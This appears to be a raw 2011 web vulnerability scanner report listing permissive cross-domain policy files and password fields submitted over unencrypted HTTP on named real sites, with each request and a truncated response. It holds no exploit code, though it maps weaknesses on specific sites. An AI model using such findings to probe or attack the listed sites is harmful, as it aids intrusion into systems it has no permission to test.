Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.136.99.118 Connection: close Content-Length: 1473 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> ...[SNIP]... <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scmagazineus |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.scmagazineus.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 21 Sep 2009 15:39:52 GMT Accept-Ranges: bytes ETag: "6cd10c3d13aca1:0" Server: Microsoft-IIS/7.5 From: Web2-VM Date: Fri, 06 May 2011 21:49:55 GMT Connection: close Content-Length: 292 <cross-domain-policy xmlns:xsi="http://www.w3 xsi:noNamespaceSchem <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.google-analytics.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://extras.expedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: extras.expedia.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 12 Apr 2010 17:22:20 GMT Accept-Ranges: bytes ETag: "cc1ebb464daca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE" Date: Fri, 06 May 2011 22:36:33 GMT Connection: close Content-Length: 475 <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="travelhook.com" /> <allow-access-from domain="test.travelhook.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.rad.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: a.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT Accept-Ranges: bytes ETag: "0d09952f3facb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Fri, 06 May 2011 20:28:07 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Fri, 06 May 2011 21:50:02 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.rad.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT Accept-Ranges: bytes ETag: "0d09952f3facb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Fri, 06 May 2011 20:28:07 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.scout.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: c.scout.com |
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT Accept-Ranges: bytes ETag: "044698a197dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Fri, 06 May 2011 19:29:07 GMT Connection: keep-alive Content-Length: 340 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <g ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.eyewonder.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: cdn.eyewonder.com |
HTTP/1.0 200 OK Cache-Control: max-age=18000 Content-Type: text/xml Accept-Ranges: bytes ETag: "a683d7574fd1ca1:13a0" Server: Microsoft-IIS/6.0 p3p: policyref="/100125/w3c X-Powered-By: ASP.NET Date: Fri, 06 May 2011 19:31:59 GMT Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT Expires: Fri, 06 May 2011 20:31:57 GMT Content-Length: 268 Connection: close <?xml version="1.0" encoding="utf-8"?><access ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://clk.atdmt.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: clk.atdmt.com |
HTTP/1.1 200 OK Content-Length: 312 Content-Type: image/gif Date: Sat, 07 May 2011 01:22:04 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://haymarketbusi |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: haymarketbusinesspub |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:03 GMT Server: Omniture DC/2.0.0 xserver: www301 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.widgets.video |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: img.widgets.video.s-msn |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Type: text/xml Last-Modified: Thu, 22 Jul 2010 20:17:26 GMT Accept-Ranges: bytes ETag: "5764ece6da29cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 19:30:35 GMT Content-Length: 348 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> </allow-from> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://om.expedia.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: om.expedia.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:33:41 GMT Server: Omniture DC/2.0.0 xserver: www54 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rad.msn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT Accept-Ranges: bytes ETag: "0d09952f3facb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Fri, 06 May 2011 19:30:46 GMT Connection: keep-alive Content-Length: 337 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <gran ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:40 GMT Server: Apache Cache-Control: max-age=604800 Expires: Sat, 14 May 2011 01:50:40 GMT Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT ETag: "ff-4adbc4fc" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://spe.atdmt.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: spe.atdmt.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Expires: Sun, 08 May 2011 15:21:17 GMT Date: Sat, 07 May 2011 11:30:17 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gofileroom.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.gofileroom.com |
HTTP/1.1 200 OK Content-Length: 390 Content-Type: text/xml Last-Modified: Fri, 04 Jun 2010 19:58:26 GMT Accept-Ranges: bytes ETag: "05d5c4b204cb1:65d5" X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:44:13 GMT Connection: close Set-Cookie: BIGipServerGFR_WWW_HTTP ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> <domain uri="https://*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.gofileroom |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.gofileroom.com |
HTTP/1.1 200 OK Content-Length: 390 Content-Type: text/xml Last-Modified: Fri, 04 Jun 2010 19:58:26 GMT Accept-Ranges: bytes ETag: "05d5c4b204cb1:338c5" X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:44:06 GMT Connection: close Set-Cookie: BIGipServerGFR_WWW_HTTP ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> <domain uri="https://*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://hmficweb |
Path: | /reglogin.aspx |
GET /reglogin.aspx HTTP/1.1 Referer: http://hmficweb User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hmficweb.hinghammutual Cookie: ASPSESSIONIDSQCDDDAA Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:35:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 7626 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Hingham Mutual</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name= ...[SNIP]... <body class="login" onload="Form1.txtUsername <form name="Form1" method="post" action="reglogin.aspx" onsubmit="javascript <div> ...[SNIP]... <div class="formField"> <input name="txtPassword" type="password" id="txtPassword" class="textbox" /> </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | / |
GET / HTTP/1.1 Referer: http://login.vindicosuite User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: login.vindicosuite.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2262 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSSSCTDAT X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:30:14 GMT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <META HTTP-EQUIV="CACHE-CONTROL <link rel="stylesheet" type="text/css" hre ...[SNIP]... <div class = "loggedInAs"> <form method="POST" action="vindico_dynamic <table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152"> ...[SNIP]... <td width="183" height="25"><input type="password" name="password" size="8"></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | /AccountManager |
GET /AccountManager Host: login.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSSSCTDAT |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3660 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:19:36 GMT <!DOCTYPE html> <html xmlns="http://www.w3.org <!-- edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM --> <head> <title>Password Reset</title> <script type="text ...[SNIP]... </div> <form name = "frm" id="frm" action = "" method = "Post" autocomplete="off"> <table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;"> ...[SNIP]... <td width="100%"> <input type ="password" name="existingPassword" value= ""> </td> ...[SNIP]... <td width="100%"> <input type ="password" name="newPassword" value=""> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.vindicosuite |
Path: | /default.asp |
GET /default.asp?message Host: login.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSSSCTDAT |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2294 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 17:21:14 GMT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <META HTTP-EQUIV="CACHE-CONTROL <link rel="stylesheet" type="text/css" hre ...[SNIP]... <div class = "loggedInAs"> <form method="POST" action="vindico_dynamic <table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152"> ...[SNIP]... <td width="183" height="25"><input type="password" name="password" size="8"></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.advisorsquare |
Path: | /useradmin/Authenticate |
GET /useradmin/Authenticate Host: www.advisorsquare.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2145 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQABRSTCR X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:36:43 GMT <html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff > <form action="authenticate.asp" method="post"> <div align="center"> ...[SNIP]... <td BGCOLOR="#5b5b5a"><input type="Password" name="Password"></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.alumnicon |
Path: | /alumni_members/mylisting |
GET /alumni_members/mylisting Host: www.alumniconnections.com Proxy-Connection: keep-alive Referer: http://www.harrisconnect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Fri, 06 May 2011 17:29:33 GMT Content-type: text/html Last-modified: Thu, 30 Apr 2009 03:01:15 GMT Content-length: 8178 Etag: "1ff2-49f9147b" Accept-ranges: bytes <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... </p> <form action="olq_redirect.cgi" method="post" Name="OLQId" onSubmit="return checkField();"> <fieldset> ...[SNIP]... </label> <input type="password" name="pass" size="14" maxlength="20"></li> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.eneighborhoods |
Path: | /login_form.asp |
GET /login_form.asp HTTP/1.1 Host: www.eneighborhoods.com Proxy-Connection: keep-alive Referer: http://www.eneighborhoods User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCRACBCR |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:40:39 GMT Content-Length: 4661 Content-Type: text/html Cache-control: private Set-Cookie: TS825c04=63b4e3a605e <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <!--Login Start--> <script ...[SNIP]... <td> <form method="post" name="formlogin" action="checklogin.asp <table width="200" border="0" cellpadding="0" cellspacing="0" bgcolor="#d8e1eb"> ...[SNIP]... <div align="left"> <input type="password" name="password" size="22" /></div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gofileroom.com |
Path: | /lbmc/ |
GET /lbmc/ HTTP/1.1 Host: www.gofileroom.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerGFR_WWW_HTTP |
HTTP/1.1 200 OK Cache-Control: No-cache Content-Length: 10672 Content-Type: text/html Expires: Sat, 07 May 2011 01:43:13 GMT X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCQQDACQB Date: Sat, 07 May 2011 01:44:13 GMT <script language="javascript" type="text/javascript"> var protocol = "https://" var server = "www.gofileroom.com" var vRoot = "" var gj= '/lbmc/Default.asp'; var httpAddress = window.location.h ...[SNIP]... <table cellpadding="0" cellspacing="5" border="0" width="274" height="158"> <form id="frmlogin" action="default.asp" method="post"> <input type="hidden" name="txtXML" value=""> ...[SNIP]... <td align="left" bordercolor="#000000"> <input id="password" type="password" class="form" name="password" style="border:1px solid #005A3C; width: 170;height:20" size="20"> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.lbmc.com |
Path: | /user |
GET /user HTTP/1.1 Host: www.lbmc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=224675399 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:36:34 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 Last-Modified: Sat, 07 May 2011 01:16:10 GMT ETag: "76f8bd4cc9a9795d232 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36665 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div><form action="http://www.lbmc <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" /> <div class="description"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.resiteonline |
Path: | / |
GET / HTTP/1.1 Host: www.resiteonline.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:52:13 GMT Server: Content-Length: 8284 Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... </h3> <form action="http://app <div id="loginbox"> ...[SNIP]... <label>Password <input type="password" name="Password" id="Password" /></label> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | / |
GET / HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:36 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=a66e1734b7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7330 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </h1> <form method="post" name="fRegister" action="/register.php"> <table> ...[SNIP]... <td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td> ...[SNIP]... <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | / |
GET / HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:36 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=a66e1734b7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7330 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'= <input type="submit" value="Login" class="button" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | /blog/ |
GET /blog/ HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:39:52 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 X-Pingback: http://www.socialfollow Set-Cookie: PHPSESSID=f9e5973c7f Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Length: 96431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head pro ...[SNIP]... <br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'= <input type="submit" value="Login" class="button" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | /login.php |
POST /login.php HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 Origin: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 Content-Length: 31 tEmail=Email&pPassword |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:53 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=71434cdaab Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 4494 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </p> <form method="post" name="fLogin" action=""> <table> ...[SNIP]... <td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | /login.php |
